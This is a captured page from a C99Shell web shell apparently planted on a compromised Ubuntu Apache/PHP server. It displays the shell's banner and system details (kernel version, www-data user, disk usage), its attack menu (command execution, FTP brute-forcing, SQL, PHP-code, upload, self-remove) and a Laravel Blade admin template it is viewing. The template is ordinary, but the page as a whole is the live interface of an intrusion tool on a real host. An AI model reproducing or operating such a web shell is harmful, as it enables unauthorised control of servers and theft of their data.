!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/resources/views/admin/frontend/   drwxr-xr-x
Free 12.96 GB of 57.97 GB (22.36%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     app.blade.php (2.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.app')
@section('head')
@include('layouts.partials.headersection',['title'=>'Frontend Settings'])
@endsection
@section('content')
<div class="card">
    <div class="card-body">
        
        <div class="row">
            <div class="col-12 col-sm-12 col-md-4">
                <ul class="nav nav-pills flex-column" id="myTab4" role="tablist">
                    <li class="nav-item">
                        <a class="nav-link  @if(route('admin.appearance.show','header') == url()->current()) active @endif" href="{{ route('admin.appearance.show','header') }}" >{{ __('Header Section') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','features') == url()->current()) active @endif" href="{{ route('admin.appearance.show','features') }}">{{ __('Features Section') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','about_1') == url()->current()) active @endif" href="{{ route('admin.appearance.show','about_1') }}">{{ __('About Section 1') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','about_2') == url()->current()) active @endif" href="{{ route('admin.appearance.show','about_2') }}">{{ __('About Section 2') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','about_3') == url()->current()) active @endif" href="{{ route('admin.appearance.show','about_3') }}">{{ __('About Section 3') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','ecom_features') == url()->current()) active @endif" href="{{ route('admin.appearance.show','ecom_features') }}">{{ __('Market Features') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','counter_area') == url()->current()) active @endif" href="{{ route('admin.appearance.show','counter_area') }}">{{ __('Counter Area') }}</a>
                    </li>
                    
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','testimonials') == url()->current()) active @endif" href="{{ route('admin.appearance.show','testimonials') }}">{{ __('Testimonials Section') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','instruction') == url()->current()) active @endif" href="{{ route('admin.appearance.show','instruction') }}">{{ __('Instruction For Custom Domain') }}</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','css-js') == url()->current()) active @endif" href="{{ route('admin.appearance.show','css-js') }}">{{ __('Custom Css And Js') }}</a>
                    </li>

                    <li class="nav-item">
                        <a class="nav-link @if(route('admin.appearance.show','brands') == url()->current()) active @endif" href="{{ route('admin.appearance.show','brands') }}">{{ __('Brands Section') }}</a>
                    </li>

                    
                </ul>
            </div>
            <div class="col-12 col-sm-12 col-md-8">
                @yield('append')
            </div>
        </div>

    </div>
</div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--